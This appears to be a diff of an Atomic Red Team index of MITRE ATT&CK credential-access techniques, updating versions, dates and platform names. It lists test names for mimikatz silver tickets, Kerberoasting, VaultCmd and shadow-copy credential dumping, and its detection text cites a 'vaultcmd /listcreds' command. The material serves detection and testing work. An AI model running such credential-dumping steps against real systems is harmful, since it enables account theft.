@@ -78895,6 +79640,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -78906,18 +79652,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -78936,9 +79682,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests:
     - name: Brute Force:Credential Stuffing using Kerbrute Tool
@@ -78988,7 +79731,7 @@ credential-access:
           \     \n"
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -79017,24 +79760,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -79069,13 +79814,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -79153,9 +79895,8 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests:
     - name: PetitPotam
@@ -79237,7 +79978,7 @@ credential-access:
         elevation_required: false
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -79253,6 +79994,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -79261,13 +80003,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -79275,15 +80017,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -79294,9 +80032,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -79342,7 +80079,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -79361,17 +80098,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -79404,10 +80140,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -79444,11 +80179,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -79516,34 +80250,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -79552,20 +80262,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -79597,7 +80329,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -79623,8 +80355,6 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests:
     - name: Crafting Active Directory silver tickets with mimikatz
@@ -79710,7 +80440,7 @@ credential-access:
           -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n"
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -79727,24 +80457,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -79785,9 +80515,8 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests:
     - name: Access Saved Credentials via VaultCmd
@@ -79818,29 +80547,7 @@ credential-access:
         name: powershell
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -79861,6 +80568,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -79875,52 +80583,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -79942,6 +80640,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -79952,23 +80651,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -80039,9 +80765,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -80100,7 +80825,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests:
     - name: Create Volume Shadow Copy with vssadmin
@@ -80399,7 +81123,7 @@ credential-access:
         elevation_required: true
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -80431,6 +81155,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -80440,7 +81165,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -80452,43 +81176,44 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests:
     - name: Request for service tickets
@@ -80693,70 +81418,7 @@ credential-access:
         name: powershell
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
